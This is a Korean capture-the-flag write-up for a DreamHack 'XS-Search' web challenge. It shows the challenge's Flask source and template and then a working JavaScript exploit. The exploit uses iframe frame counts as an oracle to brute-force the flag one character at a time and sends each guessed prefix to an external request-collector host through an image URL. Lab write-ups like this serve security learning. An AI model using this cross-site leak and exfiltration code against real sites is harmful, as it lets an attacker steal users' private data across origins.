[2025-08-19] XS-Search

🦥 본문

• app.py

    #!/usr/bin/python3
    from flask import Flask, request, render_template, make_response, redirect, url_for
    from selenium.common.exceptions import TimeoutException
    from urllib.parse import urlparse
    from selenium import webdriver
    from selenium.webdriver.chrome.service import Service
    from hashlib import md5
    import urllib
    import os
      
    app = Flask(__name__)
    app.secret_key = os.urandom(32)
      
    try:
        FLAG = open("./flag.txt", "r").read()
    except:
        FLAG = "[**FLAG**]"
      
    notes = {
        (FLAG, True), 
        ("Hello World", False), 
        ("DreamHack", False), 
        ("carpe diem, quam minimum credula postero", False)
    }
      
    def read_url(url, cookie={"name": "name", "value": "value"}):
        cookie.update({"domain": "127.0.0.1"})
        try:
            service = Service(executable_path="/chromedriver")
            options = webdriver.ChromeOptions()
            for _ in [
                "headless",
                "window-size=1920x1080",
                "disable-gpu",
                "no-sandbox",
                "disable-dev-shm-usage",
            ]:
                options.add_argument(_)
            driver = webdriver.Chrome(service=service, options=options)
            driver.implicitly_wait(3)
            driver.set_page_load_timeout(3)
            driver.get(url)
        except TimeoutException as e:
            driver.quit()
            return True
        except Exception as e:
            driver.quit()
            # return str(e)
            return False
        driver.quit()
        return True
      
    @app.route("/")
    def index():
        return render_template('index.html')
      
    @app.route('/search')
    def search():
        query = request.args.get('query', None)
        if query == None:
            return render_template("search.html", query=None, result=None)
        for note, private in notes:
            if private == True and request.remote_addr != "127.0.0.1" and request.headers.get("HOST") != "127.0.0.1:8000":
                continue
            if query != "" and query in note:
                return render_template("search.html", query=query, result=note)
        return render_template("search.html", query=query, result=None)
      
    @app.route("/submit", methods=["GET", "POST"])
    def submit():
        if request.method == "GET":
            return render_template("submit.html")
        elif request.method == "POST":
            url = request.form.get("url", "")
            if not urlparse(url).scheme.startswith("http"):
                return '<script>alert("wrong url");history.go(-1);</script>'
            if not read_url(url):
                return '<script>alert("wrong??");history.go(-1);</script>'
      
            return '<script>alert("good");history.go(-1);</script>'
      
    app.run(host="0.0.0.0", port=8000)
      
  

  • notes : (Flag, True) 같은 형태의 튜플들로 이루어진 세트.
  • read_url(url, cookie) : 웹드라이버를 통해서 해당 URL에 쿠키를 가지고 접속
  • index() : index.html을 렌더링
  • search()
    • query가 없다면 search.html을 렌더링
    • query가 있는 경우, notes의 튜플들을 검사
      • private가 True이고 요청의 remote_addr(클라이언트 IP주소)가 로컬이고 HOST가 127.0.0.1:8000(로컬)이 같은 경우에. 쿼리가 notes에 있으면 해당 쿼리값과 note 값을 응답.
  • submit()
    • GET : submit.html 렌더링
    • POST : url이 http로 시작하는지 검사하고 read_url(url, cookie)을 시도.

• search.html

      
    {% if result %}
      <h3>Searching "{{ query }}" found</h3>
      <iframe srcdoc="<pre>{{ result }}</pre>"></iframe>
    {% elif query %}
      <h3> Searching "{{ query }}" not found</h3>
    {% else %}
      <form method="GET" class="form-inline">
          <div class="form-group">
              <label class="sr-only" for="query">/</label>
              <div class="input-group">
                  <div class="input-group-addon">Query: </div>
                  <input type="text" class="form-control" id="query" name="query" placeholder="DreamHack">
              </div>
          </div>
          <button type="submit" class="btn btn-primary">Search</button>
      </form>
      
  

  • result가 있으면 <iframe> 을 통하여 <pre></pre> 삽입
  • 즉, 성공 실패 여부에 따라 iframe 개수가 달라짐

풀이 과정

<iframe id="iframe"></iframe>
<img id="img">
<script>
    async function req(url) {
        return await new Promise((resolve, reject) => {
            const iframe = document.getElementById("iframe");
            iframe.src = url;
            iframe.onload = () => { 
                if (iframe.contentWindow.frames.length != 0)
                    return resolve();
                else
                    return reject();
            };
        });
    }

    async function search(query) {
        try {
            await req(
              `http://localhost:8000/search?query=${query}`
            );
            return true;
        } catch (e) {
            return false;
        }
    }

    async function exploit() {
        let chars = "0123456789abcdef}"
        let secret = "DH{";

        while (!secret.includes("}")) {
            for (let c of chars) {
                if (await search(secret + c)) {
                    secret += c;
                    img.src = `https://hoelgcy.request.dreamhack.games/${secret}`;
                    break;
                }
            }
        }
    }

    exploit();
</script>

위의 코드를 웹 페이지에 옮기고 드림핵 툴즈에서 응답을 확인한다. 셀레늄이 3초 제한이라 일부만 출력하는 데 해당 코드를 secret 변수에 추가하면서 응답을 얻어내면 flag를 얻을 수 있다